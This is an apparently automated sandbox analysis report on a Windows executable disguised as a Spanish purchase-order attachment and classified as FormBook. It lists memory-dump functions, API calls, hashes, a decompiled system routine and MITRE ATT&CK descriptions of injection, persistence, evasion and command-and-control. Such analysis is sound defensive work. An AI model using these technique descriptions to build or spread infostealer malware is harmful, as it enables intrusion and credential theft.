Uniqueness

Uniqueness Score: -1.00%

Function 04869860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486986A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02d7b25315605f727bb5207a10a2cae60dbf1de28d02c37de35a1fcfe2197838
Instruction ID: 260c22d4c5c184775792959944959459a72165ecf389ed1bf320fe695a9b2a1e
Opcode Fuzzy Hash: 02d7b25315605f727bb5207a10a2cae60dbf1de28d02c37de35a1fcfe2197838
Instruction Fuzzy Hash: 3490027120100413F1116159451470704499BD0285F91C912A141A669D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 048699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048699AA

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdc8f33f5964d8da462dc2d7cfaea6ffe10cf27bdb7c46330b15bff85eb626e5
Instruction ID: b73cc435a27f00a1a23cbe470706a84cb948eb03be4c9d06c690127ae623844b
Opcode Fuzzy Hash: cdc8f33f5964d8da462dc2d7cfaea6ffe10cf27bdb7c46330b15bff85eb626e5
Instruction Fuzzy Hash: 179002A134100442F10061594424B060445DBE1345F51C515E205A665D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 04869910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486991A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69b179c8b82500521117d3cc9545f2ce84e6ae7ea2b7e5247736057ca9bca438
Instruction ID: 1abf5401fb2e85ca5cccd8f815302845d290fc21def390cbd8c9dc12aa31e37f
Opcode Fuzzy Hash: 69b179c8b82500521117d3cc9545f2ce84e6ae7ea2b7e5247736057ca9bca438
Instruction Fuzzy Hash: 759002B120100402F1407159441474604459BD0345F51C511A605A665E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 04869A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04869A5A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50387e67c9082967e5f0ed5914810babbb32fe0d8b863772f545c6caa5008dc9
Instruction ID: a253e702fc39126a36c57e6869d56182b417a4ab7d912400c7ba19682bba1fb0
Opcode Fuzzy Hash: 50387e67c9082967e5f0ed5914810babbb32fe0d8b863772f545c6caa5008dc9
Instruction Fuzzy Hash: 9C90026121180042F20065694C24B0704459BD0347F51C615A114A665CC955D8656561

Uniqueness

Uniqueness Score: -1.00%

Function 003E7300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 003E73A8

Strings

net.dll, xrefs: 003E7371, 003E73F7, 003E73CF, 003E73DB, 003E7403
wininet.dll, xrefs: 003E735E, 003E7367

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
Instruction ID: 0505310116ab20634b7a6d34a874671d85f39e4ed0377723b94a3af26f5bfef1
Opcode Fuzzy Hash: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
Instruction Fuzzy Hash: 473192B6505740ABC716DF65D8A1FA7B7B8AF88700F00821DFA195B281D730B945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 003E72F8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 003E73A8

Strings

net.dll, xrefs: 003E7371, 003E73CF, 003E73DB
wininet.dll, xrefs: 003E735E, 003E7367

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 258607bd017afe952dd68321f9d6344551e80528d6c124a2fa14204bab6636c0
Instruction ID: 0f2f3279dc16758dc162e91696e1272dcb2585fc094eb7fadb72453ceb6e152e
Opcode Fuzzy Hash: 258607bd017afe952dd68321f9d6344551e80528d6c124a2fa14204bab6636c0
Instruction Fuzzy Hash: A431D975505750ABC712DF66D8A1F6BBBB4FF48700F00822DFA195B282D770A545CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 003E88EA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003D3B93), ref: 003E891D

Strings

.z`, xrefs: 003E890C, 003E8918

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 53da444e255b79e20aaa50868d090a237f708e7f793ca3c5530e6887ed87ae14
Instruction ID: f16024e0442db76fc9f0c7f351b61c87a7af89cec65585c8992d7dbc997884b0
Opcode Fuzzy Hash: 53da444e255b79e20aaa50868d090a237f708e7f793ca3c5530e6887ed87ae14
Instruction Fuzzy Hash: CB0121B62082502FDB11DF68DC88EE77B689F88360F144299F88D5B242C130EA14CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E88B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(65>,?,003E3CAF,003E3CAF,?,003E3536,?,?,?,?,?,00000000,00000000,?), ref: 003E88DD

Strings

65>, xrefs: 003E88D2, 003E88DC

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65>
API String ID: 1279760036-3170344749
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: f722ee3d7a0f40ea2881a68c04bb4101070fdab331ef0e274b1b3b7719a22e3d
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 08E012B1200218ABDB14EF99CC45EA777ACAF88650F118559FA085B282C630F910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 003E88F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003D3B93), ref: 003E891D

Strings

.z`, xrefs: 003E890C, 003E8918

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: b991254af25da50ee406b790f22fd5c4008119f86c8a65de6ab566655522990b
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 6DE01AB12002146BD714DF59CC49EA777ACAF88750F014559F9085B241C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 003D7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003D72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003D72FB

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction ID: b6ad6cbaa398d58d42bec656e90a3ba4f9ee197dd19288f964abc14330ca45ff
Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction Fuzzy Hash: 3101A732A8026977E722A6959C03FBE776C5B40B51F15011AFF04BE2C1E694790646F6

Uniqueness

Uniqueness Score: -1.00%

Function 003E8922, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003E89B4

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 61d342b103049fda51a45e199902d785a9ee7ad7809454c2fee407e844721173
Instruction ID: 415d45ee6460247841e3f8fc8d429a0bac2f0d94874f326a0c12b9e6da956f2b
Opcode Fuzzy Hash: 61d342b103049fda51a45e199902d785a9ee7ad7809454c2fee407e844721173
Instruction Fuzzy Hash: 330148B2200508BBCB14CF99EC81DEB77A9AF9C350F158259FA4C97241C230E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003D9B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 003D9BB2

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 53cec5e2c257b4ff03836d2f699c3ff911165cde09e3b4787d3ea33274a8352f
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: A40125B6D0010DB7DF11DBE5EC42F9EB7789B54308F004296E9089B285F631EB14C791

Uniqueness

Uniqueness Score: -1.00%

Function 003E8960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003E89B4

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5bd6aa7638af751fe6811384532c34ce768fff90df13bd6e5115d59134b0a3a9
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 9F01B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 003E895D, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003E89B4

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 52978078e281cff5b0021b8edaeb1797ecaf87f643a5ccbd91b0ea7770720b14
Instruction ID: a3e8d18c1b3238a3a237dfa1fe9702d58e01bf223836d7d5268a57ee7800e9d0
Opcode Fuzzy Hash: 52978078e281cff5b0021b8edaeb1797ecaf87f643a5ccbd91b0ea7770720b14
Instruction Fuzzy Hash: 3301F2B6208148AFCB04DF99DC80EEB37BDAF8C350F158249FA5997241C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E7430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,003DCCF0,?,?), ref: 003E746C

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
Instruction ID: 794558cd035059f070dbc5137e75fed8131c751515c4950511df256b15612e98
Opcode Fuzzy Hash: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
Instruction Fuzzy Hash: 39E092333803143AE73165AA9C03FE7B79CCB81B24F550526FA4DEB2C1D595F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 003E8A42, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,003DCFC2,003DCFC2,?,00000000,?,?), ref: 003E8A80

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d1c717596c6a57a0a93054f0648cfb8cce0d8c1400a3df11a2c289ddeb07bd2f
Instruction ID: f982af4eccb98da379f75dffcb72c5e6387dac5f375745980d3c3487bb254fce
Opcode Fuzzy Hash: d1c717596c6a57a0a93054f0648cfb8cce0d8c1400a3df11a2c289ddeb07bd2f
Instruction Fuzzy Hash: 43E065B2604244AFC714DF55DC45FD77759EF48350F0142A9FD0C5B241C531A914CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 003E8A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,003DCFC2,003DCFC2,?,00000000,?,?), ref: 003E8A80

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 02f9b24060d9c92e4ebbef869aa8abaf1e7e2f4afe385d5365f201e171f1859e
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 6CE01AB12002186BDB10DF49CC85EE737ADAF88650F018155FA085B241C930E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 003DD42E, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,003D7C83,?), ref: 003DD45B

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b9b5e2e25aea8c4aa8365d49372cc0fac4a83df46a1c1533185f2262a6461930
Instruction ID: a7fbe478aa9b359b504a2d9be6467bd170027c5aadc0ab4fbc7ddddc55029dae
Opcode Fuzzy Hash: b9b5e2e25aea8c4aa8365d49372cc0fac4a83df46a1c1533185f2262a6461930
Instruction Fuzzy Hash: DBD05E727402043AEB20EBB5DC57FAA3794AF95740F0A4064F94DEB3C3DE60E501C520

Uniqueness

Uniqueness Score: -1.00%

Function 003DD430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,003D7C83,?), ref: 003DD45B

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: cf987c05beaec7e852333e6c027b71fa6334ef870f18c6acc140f48db4af32b5
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: C2D05E627503043AEA10AAA59C07F2632885B45B40F4A4064FA489B3C3DD60E5008161

Uniqueness

Uniqueness Score: -1.00%

Function 0486967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04869694

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 084ca1b77f0a0fcbcb48d37290cca1519beb264e6c042dce7f6b7ebbbb1be9ef
Instruction ID: ba5fb7957f3fa39b487b0fd5731a2274a276a56ad4750680a7e95f42ad559d44
Opcode Fuzzy Hash: 084ca1b77f0a0fcbcb48d37290cca1519beb264e6c042dce7f6b7ebbbb1be9ef
Instruction Fuzzy Hash: D5B02BB18010C0C5F700D76007087173D007BC0300F13C511D2034741A0338D080F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 048BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E048BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0486CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E048B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E048B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x048bfdda
0x048bfde2
0x048bfde5
0x048bfdec
0x048bfdfa
0x048bfdff
0x048bfe0a
0x048bfe0f
0x048bfe17
0x048bfe1e
0x048bfe19
0x048bfe19
0x048bfe19
0x048bfe20
0x048bfe21
0x048bfe22
0x048bfe25
0x048bfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048BFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048BFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048BFE01

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: d4aede9f513f12c235c533849ccbbba4f5ccb9c273c6bf656b9c1fe9de94da94
Instruction ID: c7c0f653984e1fe9b15f2b43b7a3581ec5c56700fa03cf216452c5d69f2515db
Opcode Fuzzy Hash: d4aede9f513f12c235c533849ccbbba4f5ccb9c273c6bf656b9c1fe9de94da94
Instruction Fuzzy Hash: C5F02832600100BFE6201A49CC01E637B5ADB40734F140705F754D56E0DAA2B83086E5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Se adjunta el pedido, proforma.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

